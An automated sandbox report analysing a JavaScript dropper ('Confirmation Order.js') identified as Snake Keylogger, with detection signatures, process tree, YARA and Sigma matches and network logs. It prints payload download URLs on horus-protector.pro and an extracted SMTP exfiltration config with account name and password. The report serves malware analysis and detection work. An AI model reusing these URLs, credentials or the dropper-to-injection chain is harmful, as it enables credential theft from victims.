Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Confirmation Order.js

Overview

General Information

Sample name:Confirmation Order.js
Analysis ID:1481479
MD5:06423b5a0a4d4f444ea943e2bdaa5461
SHA1:3f839dd6da834bc4df8faf8bac49dd7f34b5cd50
SHA256:3071ac42b0c7407d7982843858e9df6a697f4b83dd4281394fef5e79bfea2bb5
Tags:js
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Yara detected Snake Keylogger
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4084 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 7276 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • wscript.exe (PID: 7640 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\YLhjFraZZwiadZg.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7688 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • wermgr.exe (PID: 7972 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7688" "2844" "2376" "2388" "0" "0" "2436" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "sendxbundle@zulpine.shop", "Password": "LES5hyhe2NTe", "Host": "zulpine.shop", "Port": "587"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x1489a:$a1: get_encryptedPassword
      • 0x14b86:$a2: get_encryptedUsername
      • 0x146a6:$a3: get_timePasswordChanged
      • 0x147a1:$a4: get_passwordField
      • 0x148b0:$a5: set_encryptedPassword
      • 0x15f3b:$a7: get_logins
      • 0x15e9e:$a10: KeyLoggerEventArgs
      • 0x15b09:$a11: KeyLoggerEventArgsEventHandler
      0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x181d4:$x1: $%SMTPDV$
      • 0x1823a:$x2: $#TheHashHere%&
      • 0x19863:$x3: %FTPDV$
      • 0x19957:$x4: $%TelegramDv$
      • 0x15b09:$x5: KeyLoggerEventArgs
      • 0x15e9e:$x5: KeyLoggerEventArgs
      • 0x19887:$m2: Clipboard Logs ID
      • 0x19aa7:$m2: Screenshot Logs ID
      • 0x19bb7:$m2: keystroke Logs ID
      • 0x19e91:$m3: SnakePW
      • 0x19a7f:$m4: \SnakeKeylogger\
      0000000E.00000002.2565090170.0000000002DBE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 5 entries
        SourceRuleDescriptionAuthorStrings
        14.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          14.2.MSBuild.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            14.2.MSBuild.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              14.2.MSBuild.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x14a9a:$a1: get_encryptedPassword
              • 0x14d86:$a2: get_encryptedUsername
              • 0x148a6:$a3: get_timePasswordChanged
              • 0x149a1:$a4: get_passwordField
              • 0x14ab0:$a5: set_encryptedPassword
              • 0x1613b:$a7: get_logins
              • 0x1609e:$a10: KeyLoggerEventArgs
              • 0x15d09:$a11: KeyLoggerEventArgsEventHandler
              14.2.MSBuild.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1c453:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x1b685:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x1bab8:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1caf7:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 2 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_7688.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc137:$b2: ::FromBase64String(
              • 0xbda3:$s1: -join
              • 0xc14b:$s1: -join
              • 0x554f:$s4: +=
              • 0x5611:$s4: +=
              • 0x9838:$s4: +=
              • 0xb955:$s4: +=
              • 0xbc3f:$s4: +=
              • 0xbd85:$s4: +=
              • 0xe338:$s4: +=
              • 0xe3b8:$s4: +=
              • 0xe47e:$s4: +=
              • 0xe4fe:$s4: +=
              • 0xe6d4:$s4: +=
              • 0xe758:$s4: +=
              • 0xc55f:$e4: Get-WmiObject
              • 0xc74e:$e4: Get-Process
              • 0xc7a6:$e4: Start-Process

              System Summary

              barindex
              Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.37.117, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4084, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49711
              Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 132.226.247.73, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7880, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 64398
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js", ProcessId: 4084, ProcessName: wscript.exe
              Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 4084, TargetFilename: C:\Users\user\YLhjFraZZwiadZg.vbs
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.37.117, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4084, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49711
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Confirmation Order.js", ProcessId: 4084, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\YLhjFraZZwiadZg.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7640, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 7688, ProcessName: powershell.exe
              No Snort rule has matched
              Timestamp:2024-07-25T09:54:39.725147+0200
              SID:2803274
              Source Port:64398
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T09:54:53.820871+0200
              SID:2028371
              Source Port:64423
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:49.971055+0200
              SID:2803305
              Source Port:64420
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:55:12.299242+0200
              SID:2022930
              Source Port:443
              Destination Port:64424
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T09:54:41.692865+0200
              SID:2803305
              Source Port:64401
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:47.197640+0200
              SID:2803305
              Source Port:64413
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T09:54:42.472412+0200
              SID:2803274
              Source Port:64402
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T09:54:41.084532+0200
              SID:2803274
              Source Port:64398
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T09:54:31.787381+0200
              SID:2022930
              Source Port:443
              Destination Port:49712
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://horus-protector.pro/c/r4.txtAvira URL Cloud: Label: malware
              Source: 0000000E.00000002.2557460553.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendxbundle@zulpine.shop", "Password": "LES5hyhe2NTe", "Host": "zulpine.shop", "Port": "587"}

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:64399 version: TLS 1.0

              Software Vulnerabilities

              barindex
              Source: Confirmation Order.jsReturn value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe']Go to definition
              Source: Confirmation Order.jsArgument value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe', '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Confirmation Order.jsArgument value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe', '"C:\\Users\\user\\YLhjFraZZwiadZg.vbs","Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claratio', '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Confirmation Order.jsArgument value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe', '"C:\\Users\\user\\YLhjFraZZwiadZg.vbs","Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claratio', '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Confirmation Order.jsReturn value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe', "Option Explicit\n'Project Name: ,\n' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSet objS", '"C:\\Users\\user\\YLhjFraZZwiadZg.vbs","Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claratio', '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Confirmation Order.jsReturn value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe', "Option Explicit\n'Project Name: ,\n' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSet objS", '"C:\\Users\\user\\YLhjFraZZwiadZg.vbs","Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claratio', '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02BAFA39h14_2_02BAF778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02BAE61Fh14_2_02BAE431
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 02BAEFA9h14_2_02BAE431
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_02BAE005
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_02BAD7F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_02BADE23

              Networking

              barindex
              Source: Confirmation Order.jsReturn value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe']Go to definition
              Source: Confirmation Order.jsArgument value : ['"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Confirmation Order.jsArgument value : ['"C:\\Users\\user\\YLhjFraZZwiadZg.vbs","Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claratio']Go to definition
              Source: Confirmation Order.jsArgument value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe', '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Confirmation Order.jsReturn value : ["Option Explicit\n'Project Name: ,\n' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSet objS", '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Confirmation Order.jsArgument value : ['"GET","http://horus-protector.pro/c/s4.txt",false', '"GET","http://horus-protector.pro/c/r4.txt",false']Go to definition
              Source: Confirmation Order.jsReturn value : ['"Option Explicit\n\'Project Name: |path|\n\' D\\xe9claration des variables\nDim objShell, windowsDir, i\nSe', '"C:\\Users\\user\\YLhjFraZZwiadZg.vbs","Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claratio', '"Option Explicit\n\'Project Name: YLhjFraZZwiadZg\n\' D\\xe9claration des variables\nDim objShell, windows']Go to definition
              Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.11:64397 -> 1.1.1.1:53
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: UTMEMUS UTMEMUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /c/s4.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: horus-protector.proConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c/r4.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: horus-protector.proConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.11:64399 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /c/s4.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: horus-protector.proConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c/r4.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: horus-protector.proConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: horus-protector.pro
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: MSBuild.exe, 0000000E.00000002.2565090170.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002D67000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2565090170.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
